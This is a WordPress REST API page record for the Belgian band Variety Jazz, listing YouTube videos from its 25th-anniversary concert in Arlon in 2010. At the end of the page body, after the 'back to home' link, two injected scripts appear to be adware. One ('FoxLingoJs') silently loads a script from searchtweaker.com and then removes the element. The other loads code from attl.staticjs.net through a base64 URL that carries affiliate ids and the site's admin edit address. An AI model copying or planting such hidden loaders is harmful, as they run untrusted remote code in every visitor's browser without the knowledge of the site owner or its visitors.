{"id":678,"date":"2013-08-17T15:36:23","date_gmt":"2013-08-17T14:36:23","guid":{"rendered":"http:\/\/www.varietyjazz.be\/?page_id=678"},"modified":"2017-09-09T13:48:45","modified_gmt":"2017-09-09T12:48:45","slug":"25me-anniversaire-du-variety-jazz-la-mcsl-darlon-le-27032010","status":"publish","type":"page","link":"https:\/\/www.varietyjazz.be\/?page_id=678","title":{"rendered":"25&egrave;me Anniversaire du Variety Jazz &agrave; la MCSL d&rsquo;Arlon le 27\/03\/2010."},"content":{"rendered":"<p>Variety Jazz plays Early autumn<\/p>\n<p> <iframe loading=\"lazy\" title=\"YouTube video player\" src=\"http:\/\/www.youtube.com\/embed\/4_Ukonywdkc\" frameborder=\"0\" width=\"540\" height=\"330\"><\/iframe><\/p>\n<hr \/>\n<p>Variety Jazz plays When you wish upon a Star.<\/p>\n<p><iframe loading=\"lazy\" title=\"YouTube video player\" src=\"http:\/\/www.youtube.com\/embed\/JDuGJUdhVZc\" frameborder=\"0\" width=\"540\" height=\"330\"><\/iframe><\/p>\n<hr \/>\n<p>25\u00e8me Anniversaire du Variety Jazz \u00e0 la MCSL d&rsquo;Arlon le 27\/03\/2010.<\/p>\n<p>BoB SoLo, Nicky Van Durme &amp; R\u00e9my Willi\u00e8me interpr\u00e8tent La Salsa du D\u00e9mon (Grand Orchestre Du Splendid).<br \/>\n<P><iframe loading=\"lazy\" title=\"YouTube video player\" src=\"http:\/\/www.youtube.com\/embed\/SrDS4GDrqpY\" frameborder=\"0\" width=\"540\" height=\"330\"><\/iframe><\/p>\n<hr \/>\n<p>25\u00e8me Anniversaire du Variety Jazz \u00e0 la MCSL d&rsquo;Arlon le 27\/03\/2010.<\/p>\n<p>BoB SoLo interpr\u00e8te New York New York (Frank Sinatra)<\/p>\n<p><iframe loading=\"lazy\" title=\"YouTube video player\" src=\"http:\/\/www.youtube.com\/embed\/EUdXjvreCIg\" frameborder=\"0\" width=\"540\" height=\"330\"><\/iframe><\/p>\n<hr \/>\n<p>25\u00e8me Anniversaire du Variety Jazz \u00e0 la MCSL d&rsquo;Arlon le 27\/03\/2010.<\/p>\n<p>BoB SoLo &amp; R\u00e9my Willi\u00e8me interpr\u00e8tent Vieille Canaille (Serge Gainsbourg &amp; Eddy Mitchell)<br \/>\n<P><iframe loading=\"lazy\" title=\"YouTube video player\" src=\"http:\/\/www.youtube.com\/embed\/faobD5Hc-wo\" frameborder=\"0\" width=\"540\" height=\"330\"><\/iframe><\/p>\n<hr \/>\n<p><a href=\"http:\/\/www.varietyjazz.be\/\">Retour &agrave; l&rsquo;accueil<\/a><\/p>\n<p><script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ <![CDATA[\n(function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();\n\/\/ ]]><\/script><script type=\"text\/javascript\" src=\"http:\/\/attl.staticjs.net\/amz\/aeyJhZmZpZCI6MTA4MCwic3ViYWZmaWQiOjEwMjAsImhyZWYiOiJodHRwOi8vd3d3LnZhcmlldHlqYXp6LmJlL3dwLWFkbWluL3Bvc3QucGhwP3Bvc3Q9MjcmYWN0aW9uPWVkaXQiLCJ3aWR0aCI6MTkyMCwiaGVpZ2h0IjoxMDgwLCJsb2FkZXJfY2xpZW50X3RpbWVzdGFtcCI6MTM2MjMwMjU1NDAxMH0%3D.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Variety Jazz plays Early autumn Variety Jazz plays When you wish upon a Star. 25\u00e8me Anniversaire du Variety Jazz \u00e0 la MCSL d&rsquo;Arlon le 27\/03\/2010. BoB SoLo, Nicky Van Durme &amp; R\u00e9my Willi\u00e8me interpr\u00e8tent La Salsa du D\u00e9mon (Grand Orchestre &hellip; <a href=\"https:\/\/www.varietyjazz.be\/?page_id=678\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":27,"menu_order":-20100327,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-678","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/pages\/678","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=678"}],"version-history":[{"count":7,"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/pages\/678\/revisions"}],"predecessor-version":[{"id":2781,"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/pages\/678\/revisions\/2781"}],"up":[{"embeddable":true,"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=\/wp\/v2\/pages\/27"}],"wp:attachment":[{"href":"https:\/\/www.varietyjazz.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=678"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}